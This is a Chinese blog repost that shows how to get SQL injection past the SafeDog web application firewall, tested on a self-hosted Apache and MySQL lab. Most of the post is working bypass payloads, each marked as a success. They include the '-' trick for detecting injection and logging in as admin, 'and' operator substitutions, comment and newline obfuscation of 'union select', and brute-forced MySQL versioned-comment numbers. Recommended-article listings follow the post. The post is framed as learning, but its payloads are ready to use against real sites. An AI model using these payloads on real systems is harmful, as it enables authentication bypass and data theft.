sql减法语句_Sql注入过安全狗

最新推荐文章于 2023-12-01 20:53:53 发布
最新推荐文章于 2023-12-01 20:53:53 发布
阅读量532 收藏 2
点赞数
文章标签: sql减法语句

非原创,转自https://www.cnblogs.com/yuanzijian-ruiec/p/10985022.html,学习学习新姿势。

先去安全狗网站下载最新的安全狗版本

9c4a8a750a0f3effb247d516be0695f3.png

从官网下载 windwos apache版 v4.0.2395 最新版 数据库是mysql 5.6

1.首先判断是否有注入点包括是字符型还是数字型注入

我们假设他是数字型注入 构造 id=0=0

5dfec4efc69d760b1ca66df2647c1e14.png

在数据库中执行

e9530b26e082e9a974fdd9c2887243dc.png

获取了全部数据 从返回的数据 我们立马断定他是数字型注入 而如果是字符型注入 代码里应该是 where id='$id' 就是

select * from `users` where id='0=0' 返回结果为空 那怎么判断是字符型注入呢? 利用t-sql 弱语言特性 true-false 减法转换

输入 '-' 在数据库里就是 username=''-'' 如果执行返回有数据 可以判断是字符注入

aa4b2b16f4902224ead6aeddee69077f.png

返回所有不为空的数据 就是所有 我们可以在登录时输入判断是否有注入

b75e6e4d56ae39426b1a16ee166a4d4c.png

默认登录表中第一个用户 也可以把 用户改成 admin 密码是 '-' 就可以登录amdin账户 通过上面的例子 我们通过 0=0 和 '-' 迅速判断是否有注入和注入类型

知道有注入后下一步先对最简单

2. and 1=1 绕过

and 1 拦截
and '1' 拦截
and a 不拦截
and "a"拦截
and ! 不拦截
and 1+1 拦截
and 1+a 拦截
and hex(1) 不拦截

and 后面跟上 数字型和字符型时他会给我们拦截掉 可以用其他的运算符号 | ^ xor & / * && || -+

1^1,1|1 ,1&1 1-1 1+1 1 xor 1 都是不拦的 我们以减号为例子

id=''-(ascii(mid(database/**/()from-1))<100)-'' 成功

我们对 database() 变形 database/**/() 可以运用布尔注入写成脚本跑出所有数据

3.内联注入绕过

内联也是安全狗查的最严的,这个也是重头戏 这里用的姿势对其他的waf同样有效

union 不拦截
select 不拦截
union select 拦截
union 各种字符 select 不拦截
union/*select*/ 不拦截

union x select 安全狗是不拦的 可以把x 替换成可以执行的语句 例如

union all select

union distinctrow select

union disinct select

union all|distinctrow|disinct(select xxxx) 后面用阔号包起来 有很多种组合方式 配合/*!*/ 可以绕过

id=0 union /*!distinctrow/*!(select~1,2,3)*/ %23 成功

id=0 /*!union/*!all/**//*!select*/~1,2,3--+     成功

x也可以替换成换行符号和空格 通过组合各种绕过 姿势太多了 只拿几个出来展示

%09,%0a,%0b,%0c,%0d,%20,%a0

id=0 union all%23%0a select 1,2,3 成功

id=0 union %23%0aall select 1,2,3 成功

id=0 union --+X%0A select 1,2,3%23

id=0 union %0a%23%0a select 1,2,3 这个前几个版本是可以的绕过的

id=0 union %0a--+%0a select 1,2,3 这个前几个版本是可以的绕过的

0e60cfba538abd2772cd67d6eb4d794d.png

现在我们需要加入其他注释符混淆

id=0 --+/*%0aunion select 1,2,3 %0a--+*/   成功

id=0 --+/*%0aunion select 1,2,3 %0a%23*/   成功

ba67c9e380b2b7eb69677ae79d8a3104.png

我们发现 /**/ 里面的安全狗都不检查 我们可以

id=0/*&id=0 union select 1,2,3%23*/ 成功

id=0-"/*" union select 1,2,3 "*/"   成功

id=0-'/*' union select 1,2,3 '*/'  成功

id=0-'/*' union select 1,2,3 %23*/  成功

id=0-'/*' union select 1,2,3 --+*/  成功

e31df1cfdd6f7bda5fb66158371a891e.png

还可以利用版本号绕过/*!50000xxx*/

id=0 union /*!50000select*/ 1,2,3%23 不通过 从00000~99999 总有漏网之鱼 我们这里的mysql 版本是5.6 其实只有00000~56000 才能成功执行

通过脚本跑出来了

15f7aedeec259a804645e294386df297.png

剔除大于56000的

['00044', '00044', '00144', '00144', '00244', '00244', '00344', '00344', '00449', '00449', '00448', '00448', '00447', '00447', '00446', '00446', '00445', '00445', '00444', '00444', '00443', '00443', '00442', '00442', '00441', '00441', '00440', '00440', '00544', '00544', '00644', '00644', '00744', '00744', '00844', '00844', '00944', '00944', '01044', '01044', '01144', '01144', '01244', '01244', '01344', '01344', '01444', '01444', '01443', '01443', '01442', '01442', '01441', '01441', '01440', '01440', '01447', '01447', '01446', '01446', '01445', '01445', '01449', '01449', '01448', '01448', '01544', '01544', '01644', '01644', '01744', '01744', '01844', '01844', '01944', '01944', '02044', '02044', '02144', '02144', '02244', '02244', '02344', '02344', '02442', '02442', '02441', '02441', '02440', '02440', '02446', '02446', '02445', '02445', '02444', '02444', '02443', '02443', '02544', '02544', '02449', '02449', '02448', '02448', '02447', '02447', '02644', '02644', '02744', '02744', '02844', '02844', '02944', '02944', '03044', '03044', '03144', '03144', '03244', '03244', '03344', '03344', '03442', '03442', '03441', '03441', '03440', '03440', '03445', '03445', '03444', '03444', '03443', '03443', '03449', '03449', '03448', '03448', '03447', '03447', '03446', '03446', '03544', '03544', '03644', '03644', '03744', '03744', '03844', '03844', '03944', '03944', '04044', '04044', '04144', '04144', '04244', '04244', '04344', '04344', '04400', '04400', '04401', '04401', '04402', '04402', '04403', '04403', '04404', '04404', '04405', '04405', '04406', '04406', '04407', '04407', '04408', '04408', '04409', '04409', '04410', '04410', '04411', '04411', '04413', '04413', '04412', '04412', '04414', '04414', '04415', '04415', '04416', '04416', '04417', '04417', '04418', '04418', '04419', '04419', '04420', '04420', '04421', '04421', '04422', '04422', '04423', '04423', '04424', '04424', '04425', '04425', '04426', '04426', '04427', '04427', '04428', '04428', '04429', '04429', '04430', '04430', '04431', '04431', '04432', '04432', '04433', '04433', '04434', '04434', '04435', '04435', '04436', '04436', '04437', '04437', '04438', '04438', '04439', '04439', '04441', '04441', '04440', '04440', '04443', '04443', '04442', '04442', '04444', '04444', '04445', '04445', '04446', '04446', '04447', '04447', '04448', '04448', '04450', '04450', '04449', '04449', '04452', '04452', '04451', '04451', '04453', '04453', '04454', '04454', '04455', '04455', '04456', '04456', '04458', '04458', '04457', '04457', '04459', '04459', '04460', '04460', '04465', '04465', '04464', '04464', '04463', '04463', '04461', '04461', '04462', '04462', '04466', '04466', '04467', '04467', '04468', '04468', '04469', '04469', '04471', '04471', '04470', '04470', '04472', '04472', '04473', '04473', '04474', '04474', '04475', '04475', '04476', '04476', '04479', '04479', '04477', '04477', '04478', '04478', '04480', '04480', '04481', '04481', '04482', '04482', '04483', '04483', '04484', '04484', '04485', '04485', '04489', '04489', '04488', '04488', '04487', '04487', '04486', '04486', '04495', '04495', '04494', '04494', '04493', '04493', '04492', '04492', '04491', '04491', '04490', '04490', '04499', '04499', '04498', '04498', '04497', '04497', '04496', '04496', '04544', '04544', '04644', '04644', '04744', '04744', '04844', '04844', '04944', '04944', '05044', '05044', '05144', '05144', '05244', '05244', '05344', '05344', '05440', '05440', '05441', '05441', '05442', '05442', '05443', '05443', '05444', '05444', '05445', '05445', '05446', '05446', '05447', '05447', '05449', '05449', '05448', '05448', '05544', '05544', '05644', '05644', '05744', '05744', '05944', '05944', '05844', '05844', '06044', '06044', '06144', '06144', '06244', '06244', '06344', '06344', '06441', '06441', '06440', '06440', '06544', '06544', '06449', '06449', '06448', '06448', '06447', '06447', '06446', '06446', '06445', '06445', '06444', '06444', '06443', '06443', '06442', '06442', '06644', '06644', '06744', '06744', '06844', '06844', '06944', '06944', '07044', '07044', '07144', '07144', '07244', '07244', '07344', '07344', '07444', '07444', '07443', '07443', '07442', '07442', '07441', '07441', '07440', '07440', '07449', '07449', '07448', '07448', '07447', '07447', '07446', '07446', '07445', '07445', '07544', '07544', '07644', '07644', '07744', '07744', '07844', '07844', '07944', '07944', '08044', '08044', '08144', '08144', '08244', '08244', '08344', '08344', '08440', '08440', '08449', '08449', '08441', '08441', '08448', '08448', '08447', '08447', '08446', '08446', '08445', '08445', '08444', '08444', '08443', '08443', '08442', '08442', '08544', '08544', '08644', '08644', '08744', '08744', '08844', '08844', '08944', '08944', '09044', '09044', '09144', '09144', '09244', '09244', '09344', '09344', '09440', '09440', '09441', '09441', '09449', '09449', '09448', '09448', '09447', '09447', '09446', '09446', '09445', '09445', '09444', '09444', '09443', '09443', '09442', '09442', '09544', '09544', '09644', '09644', '09744', '09744', '09844', '09844', '09944', '09944', '10044', '10044', '10144', '10144', '10244', '10244', '10344', '10344', '10440', '10440', '10445', '10445', '10444', '10444', '10443', '10443', '10442', '10442', '10441', '10441', '10449', '10449', '10448', '10448', '10447', '10447', '10446', '10446', '10544', '10544', '10644', '10644', '10744', '10744', '10844', '10844', '10944', '10944', '11044', '11044', '11144',......

随便测试几个

id=0 union /*!44579select*/ 1,2,3%23 成功

id=0 union /*!01344select*/ 1,2,3%23  成功

id=0 union /*!50445select*/ 1,2,3%23  成功

cdd0411007f79ba82efe64d1df19e2e8.png
weixin_39931101
关注
〖Python 数据库开发实战 - MySQL篇⑯〗- SQL 语句的条件查询
易编橙 · 终身成长社群,相遇已是上上签!
07-26 4万+
该章节我们来学习条件查询,有了条件查询,就可以查找出符合条件的查找记录了。比如说 "10" 和 "20" 部门月薪超过 "2000" 的员工信息,只有条件查询才能帮我们筛选出这种想要的信息记录。
【项目实战】MySQLSQL_MODE数据模式入门介绍
本本本添哥
11-27 1350
sql_mode可以设置多种模式,每个模式都代表一种SQL行为。以下是常见SQL_MODE设置及其作用,除了以下模式外,还有许多其他的模式等。详细的文档可以在MySQL官方文档中找到。
sql 减法_SQL学习笔记整理(持更)
weixin_39733805的博客
12-04 6805
从零开始学习SQL,在这里分享自己的笔记,主要通过自己看的、做的例题映射知识点。入门级SQL 应知应会Key Point与例题。虽然这个笔记不是最全面深入的,但一定必含小白入门必懂基础要点(非常基础),还有常常不小心就会踩的坑都在这里了,主要针对知识点在实际应用中的理解。数据练习可以自己找其他做比如SQLZOO。可乐:SQL ZOO习题笔记由于这里有些语句打出来无法突出,采取截图,层次展现更直观清...
sql减法语句_SQL入门之多表查询
weixin_39652154的博客
12-05 1376
表的运算1、表的加法(UNION),表的减法(EXCEPT),表的交集(INTERSECT);2、表运算的注意事项:作为运算对象的表的列数必须相同;类型必须相同;可以使用任何select子句,但是order by只能在最后一次使用;默认结果不包含重复行,但是如果想保留重复行需要在后面加入ALL关键字。联结简单来说,联结就是将其他表中的列添加过来。一般我们期望得到的数据都是分散在多张表的,使用联结就...
sql注入绕过安全狗
weixin_48776804的博客
02-15 673
sql注入安全狗
绕过安全狗SQL注入
baynk的博客
08-06 3379
搞了几天CTF的注入后,熟悉了一些姿势,来尝试对安全狗进行绕过,发现出人意料的简单,主要是用来记录下当前安全的绕过方式,反正过一段时间可能就不能用了。。。不做任何解释,仅做记录,原理基本上在之前的博客中都有写 实验环境 windows server 2008 phpstudy 安全狗V4.0.2395 实验前准备 开启phpstudy,这次和之前有点区别,由于要安装安全狗,所以在开启phpst...
SQL注入-过安全狗apache4.0
m0_60716947的博客
05-15 952
目录 一、安全狗的安装 二、Fuzz 三、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-CSDN博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
oracle SQL语句
04-19
### Oracle SQL语句详解 #### 一、SQL规范与注释 在Oracle SQL中,注释主要用于添加说明性文本,帮助理解SQL脚本的目的和功能。注释有两种基本形式: - **单行注释**:使用`--`,之后的所有内容被视为注释,直到...
位数不足前面补0mysql语句_SQL语句 不足位数补0
weixin_26741253的博客
12-24 1万+
select RIGHT('0000'+CAST( '123' AS nvarchar(50)),4) DWBH 公式RIGHT('位数'+CAST(要判断的字段 ASnvarchar(50)),位数 )……--第一种方法SELECTRIGHT('00000'+CAST(IDASnvarchar(50)),5)FROMdbo.TableName--左边补0,如00001,000...
***学习笔记--基础篇--sql注入(数字型)
weixin_34364071的博客
09-28 606
环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium一、分析和查找注入点(1)知识点回顾如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的payload(有效载荷)的话,则我们必须先闭合前面的单引号或者双引号,否则我们的数据始终会被...
sql 减法_运用SQL对数据进行集合运算
weixin_39951929的博客
12-04 8095
一、集合运算集合在数学领域表示“(各种各样的)事物的总和”,在数据库领域表示记录的集合。具体来说,表、 视图和查询的执行结果都是记录的集合。 因此,可以将集合运算理解为对满足同一规则的记录进行的加减等四则运算。通过集合运算,可以得到两张表中记录的集合或者公共记录的集合,又或者其中某张表中的记录的集合。像这样用来进行集合运算的运算符称为集合运算符。 二、表的加减法2.1 表的加法(语法:UNION/...
sql 减法_从零学会SQL-简单查询
weixin_39622398的博客
12-09 1468
练习:查询学生表第一步,点击school 数据库下面的【查询】按键,右键选择【新建查询】,如下图中数字1所示,或者直接按照图中数字2所示处点击【新建查询】第二步,在【查询编辑器】中输入SQL语句:select * from student;点击【运行】,则可在结果中看到student表的所有数据信息,如下图所示:练习:理解SQL运行顺序SQL运行顺序是:select字句最后运行,其他字句按照书写顺...
SQL 算术运算符:加法、减法、乘法、除法和取模的用法
最新发布
小万哥的博客
12-01 7606
为了方便其他设备和平台的小伙伴观看往期文章:公众号搜索,或者扫描下方二维码,关注公众号,即可获取最新文章。看完如果觉得有帮助,欢迎和关注。
数据库中表的加减法
DINGDING156的博客
10-03 1万+
通过集合运算可以得到记录的集合或者公共记录的集合。 一:加法:union 1、表的加法:union,并集,但是会去重,就是去重重复的记录。 select * from A union select * from B. 2、union集合运算要求有相同的列,如果一个表中没有另一个表的列,那么会发生错误 3、使用union时,order by 只可在语句的最后使用。 4、如果想包含重复的记录,只要在...
SQL注入进阶-测试及利用方法总结
u013797594的博客
08-05 6202
SQL注入进阶-测试及利用方法总结 文章目录SQL注入进阶-测试及利用方法总结SQL注入漏洞简介SQL注入漏洞分类SQL注入漏洞检测及利用基于输入类型字符型注入整数型注入基于从服务器接收到的响应错误回显注入测姿势错误回显利用方法1.不同类型的数据加减乘除2.group by floor(rand(0)*2)产生错误利用姿势及注意事项3.extractvalue()产生错误利用姿势及注意事项4.updatexml( )利用姿势及注意事项5.exp double型数据溢出利用姿势及注意事项6.bigint溢出利
详细了解SQL注入
m0_60571990的博客
02-20 230
详细了解SQL
case when 子查询_SQL学习笔记(五)多表查询
weixin_39929721的博客
11-21 155
从零学会SQL:多表查询​www.zhihu.com本篇将结合课程内容和《SQL基础教程》中的第7章内容对集合运算进行整理。之前的学习多为在一张表上的操作,本篇主要通过以行方向(竖)为单位的集合运算符和以列方向(横)为单位的联结,将多张表中的数据进行组合。什么是集合运算?集合运算就是对满足同一规则的记录进行的加减法的四则运算。通过集合运算,可以得到几张表中记录的集合或者公共记录的集合,又或者其中某...
mysql update 加减乘除运算
热门推荐
whatday的专栏
11-29 1万+
在处理提现操作时,遇到这样一个问题:account_money为用户剩余金额,提现之后要减去相应金额,需要用update语句进行运算,记录一下 update之前数据库数据(下边所有的数据演示都是与前一步数据进行对比)    1、减法: update money_user_bank set account_money=account_money-100 where id=1   结果: ...
SQL SELECT语句基础知识详解
SQL SELECT 语句基础知识 SQL SELECT 语句SQL 语言中最基本也是最常用的语句之一。它用于从数据库中选择数据,并将其返回给用户。本节将详细介绍 SQL SELECT 语句的基本语法、功能和使用方法。 一、 SQL SELECT...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值